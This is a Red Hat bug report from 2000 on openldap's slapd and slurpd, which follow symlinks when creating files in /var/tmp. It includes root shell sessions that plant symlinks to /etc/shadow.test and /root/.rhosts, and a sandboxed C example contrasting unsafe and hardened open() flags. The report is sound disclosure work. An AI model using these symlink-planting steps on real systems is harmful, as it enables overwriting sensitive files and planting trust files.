Bug 10714 - Insecure file creation using static files which follow symlinks.
Summary: Insecure file creation using static files which follow symlinks.
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: openldap
Version: 6.2
Hardware: All
OS: Linux
high
medium
Target Milestone: ---
Assignee: Nalin Dahyabhai
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
Reported: 2000-04-11 00:57 UTC by SB
Modified: 2008-05-01 15:37 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-04-24 06:41:33 UTC
Embargoed:



Description SB 2000-04-11 00:57:44 UTC
I was trying out the new openldap package (openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID -> /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows the symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd to my knowledge will only create files; it will not overwrite or
truncate previously existing files.  Also, after slapd is running, if you
type slurpd, it will try to read from /var/tmp/slurpd.status, fail, and then
write to /var/tmp/slurpd.status.lock, which can be a symlink to any file you
wish to create, truncating any existing file to 0 bytes.  There are other
instances I noticed in the code, such as /tmp/slurpd.dump and other files, that
probably behave the same. Not good.

-Stan Bubrouski
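Added example (not OpenLDAP's code) showing the open(2) flag difference behind the report: a status file created with O_CREAT|O_TRUNC follows a planted symlink and truncates its target, while O_CREAT|O_EXCL|O_NOFOLLOW refuses the pre-existing name. The scenario is rebuilt in a private mkdtemp() directory with a constructed 780-byte victim file named after the report's shadow.test; no system paths are touched.

```c
/* Added example (not OpenLDAP code): the open(2) flags that decide whether
 * creating a status file such as /var/tmp/NEXTID follows a planted symlink.
 * Everything runs inside a private mkdtemp() directory. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the report describes: O_CREAT|O_TRUNC on a predictable name.
 * A symlink at that name is followed and its target truncated to 0 bytes. */
int unsafe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    return close(fd);
}

/* Hardened form: O_EXCL fails with EEXIST if the name already exists (a
 * symlink counts, even a dangling one) and O_NOFOLLOW additionally refuses a
 * symlink in the final component. The directory should also not be
 * world-writable, but that is outside what open() flags can fix. */
int safe_create(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    return close(fd);
}

/* Rebuilds the report's scenario: a constructed 780-byte victim file and a
 * symlink named NEXTID pointing at it, then runs `create` on the symlink.
 * Returns the victim's size afterwards, or -1 if setup failed. */
long run_scenario(int (*create)(const char *))
{
    char dir[] = "/tmp/symlinkdemo.XXXXXX", victim[64], link[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/shadow.test", dir);
    snprintf(link, sizeof link, "%s/NEXTID", dir);
    FILE *f = fopen(victim, "w");
    if (f == NULL) return -1;
    for (int i = 0; i < 780; i++) fputc('x', f);
    fclose(f);
    if (symlink(victim, link) != 0) return -1;
    create(link);          /* result ignored on purpose: the victim's size is the evidence */
    if (stat(victim, &st) != 0) return -1;
    unlink(link); unlink(victim); rmdir(dir);
    return (long)st.st_size;
}
```

run_scenario(unsafe_create) leaves the victim at 0 bytes, exactly what the `ls -al /etc/shadow.test` output above shows after `ldap stop`; run_scenario(safe_create) leaves it at 780 because open() refuses the existing symlink.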

Comment 1 Cristian Gafton 2000-04-24 06:41:59 UTC
Errata released that fixes the problem.

